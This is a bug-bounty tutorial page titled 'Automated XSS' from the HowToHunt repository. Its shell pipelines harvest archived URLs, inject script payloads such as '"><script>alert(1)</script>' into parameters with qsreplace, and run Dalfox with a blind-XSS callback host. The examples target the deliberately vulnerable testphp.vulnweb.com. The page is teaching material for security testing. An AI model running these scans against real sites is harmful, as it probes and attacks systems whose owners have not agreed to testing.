🕵️
HowToHunt
  • HowToHunt.md
  • API Testing
    • Hidden API Functionality Exposure
    • Reverse Engineer an API
  • Account Takeover Methodology
    • Account Takeover Methodology
  • Application Level DoS
    • Application Level DoS Methods
  • Authentication Bypass
    • 2FA Bypasses
    • OTP Bypass
    • Account Ban Bypass
  • Broken-Link Hijacking
    • Broken-Link Hijacking
  • Broken Auth And Session Management
    • Session Based Bugs
  • CMS
    • AEM
    • Drupal
    • Wordpress
    • Moodle
  • CORS
    • CORS
    • CORS Bypasses
  • CSRF
    • CSRF
    • CSRF MindMap
    • CSRF Bypass
  • Finding CVEs
    • CVES
  • CheckList
    • Web Application Pentesting Checklist
    • Web Checklist by Chintan Gurjar.pdf
    • Web Checklist by Tushra Verma.pdf
    • Mindmap by Rohit Gautam
    • Mindmap by Cristian Cornea
  • Web Page Source Code Review
    • Web Page Code Review Tips
  • EXIF Geo Data Not Stripped
    • EXIF Geo Data Not Stripped
  • File Upload Bypass
    • File Upload Bypass
  • Find Origin IP
    • Find Origin
  • GraphQL
    • GraphQL
  • HTTP Desync Attack
    • HTTP_Desync
  • Host-Header Attack
    • Host-Header
  • HTML-Injection
    • HTML-Injection
  • IDOR
    • IDOR
  • JWT ATTACK
    • JWT
  • JIRA ATTACK
    • JIRA
  • MFA Bypass
    • MFA Bypasses
    • 2FA-Bypass
  • Misconfigurations
    • Default Credential And Admin Panel
    • Docker
    • S3 Bucket
  • OAuth
    • OAuth
    • OAuth Hunting
  • Open Redirection
    • Find OpenRedirect Trick
    • Open Redirection Bypass
  • Parameter Pollution
    • Parameter Pollution In Social Sharing Buttons
  • Password Reset Functionality
    • MindMap
    • Password Reset Token Leakage
    • Account_Takeover_By_Password_Reset_Functionality
    • Password_Reset_Flaws
  • Rate Limit
    • Rate Limit Flaws
    • Rate-Limit Bypass
    • No Rate-Limit on Verify-PhoneNo
    • No Rate-limit on Invite User
    • No Rate-limit on Promo
    • No Rate-limit on Verify-email
    • No Rate-limit on forget-password
  • Race Condition
    • Race Condition
  • Recon
    • Github
    • Recon Workflow
    • Subdomain Enumeration
  • SQLi
    • SQL Injection.md
  • SAML
    • SAML
  • SSRF
    • SSRF
    • Blind SSRF
  • SSTI
    • SSTI
  • Sign Up Functionality
    • Sign Up Bugs
    • Sign Up MindMap
  • Sensitive Info Leaks
    • Github Recon Method
    • Github-Dorks
    • Github Dorks All
    • Google Dorks
    • Shodan CVE Dorks
    • Version Leaks
  • Status Code Bypass
    • Status_Code_Bypass Tips
    • 403 Bypass
  • Subdomain Takeover
    • Subdomain Takeover - Detail Method
    • Subdomain Takeover - Easy Method
    • Subs or Top level Domain
  • Tabnabbing
    • Tabnabbing
  • WAF Bypasses
    • WAF Bypass Using Headers
  • Weak Password Policy
    • Weak Password Policy
  • XSS
    • XSS
    • Bypass CSP
    • XSS Bypass
    • Automated XSS
    • Post Message Xss
  • XXE
    • XXE Methods
    • Billion Laugh Attack
Powered by GitBook
On this page
  • Prerequisites: Installing Go on Your Machine
  • Hunting Blind XSS Using Dalfox
  • Execution Command:
  • Hunting Reflected XSS
  • Execution Command:
  • Identifying Parameters That Do Not Filter Special Characters
  • Downloading the Required Tools
  • Contact Information
  1. XSS

Automated XSS

Prerequisites: Installing Go on Your Machine

Before proceeding, ensure that Go is installed on your system. You can install it using the following commands:

sudo apt install -y golang
export GOROOT=/usr/lib/go
export GOPATH=$HOME/go
export PATH=$GOPATH/bin:$GOROOT/bin:$PATH
source .bashrc

Hunting Blind XSS Using Dalfox

To detect blind XSS vulnerabilities, follow these steps:

  1. Use WaybackURLs to extract URLs for the target.

  2. Use GF patterns to identify possible XSS-vulnerable parameters.

  3. Utilize Dalfox to detect XSS.

Execution Command:

waybackurls testphp.vulnweb.com | gf xss | sed 's/=.*/=/' | sort -u | tee Possible_xss.txt && \
cat Possible_xss.txt | dalfox -b blindxss.xss.ht pipe > output.txt

Hunting Reflected XSS

To identify reflected XSS vulnerabilities, follow these steps:

  1. Extract URLs using WaybackURLs.

  2. Use qsreplace to inject payloads and analyze responses.

Execution Command:

waybackurls testphp.vulnweb.com | grep '=' | qsreplace '"><script>alert(1)</script>' | \
while read host; do
    curl -s --path-as-is --insecure "$host" | grep -qs "<script>alert(1)</script>" && \
    echo "$host \033[0;31m Vulnerable"
done

Identifying Parameters That Do Not Filter Special Characters

The following command checks whether parameters accept special characters without proper sanitization:

echo "test.url" | waybackurls | grep "=" | tee waybackurls.txt
cat waybackurls.txt | egrep -iv ".(jpg|jpeg|js|css|gif|tif|tiff|png|woff|woff2|ico|pdf|svg|txt)" | \
qsreplace '"><()' | tee combinedfuzz.json && \
cat combinedfuzz.json | while read host; do
    curl --silent --path-as-is --insecure "$host" | grep -qs "\"><()" && \
    echo -e "$host \033[91m Vulnerable \e[0m \n" || \
    echo -e "$host \033[92m Not Vulnerable \e[0m \n"
done | tee XSS.txt

Downloading the Required Tools

The following tools are required for this process:

Tool
GitHub Repository

Dalfox

WaybackURLs

GF

GF Patterns

qsreplace

A complete script can be found here: QuickXSS

Contact Information

For any questions or further discussions, feel free to reach out on Twitter:

  • @g0t_rOoT_

  • @Fani Malik

  • @Faizee Asad

  • @Prince Prafull

Enhanced and reformatted for HowToHunt repository by remonsec

PreviousXSS BypassNextPost Message Xss

Last updated 13 days ago

Dalfox
WaybackURLs
GF
GF Patterns
qsreplace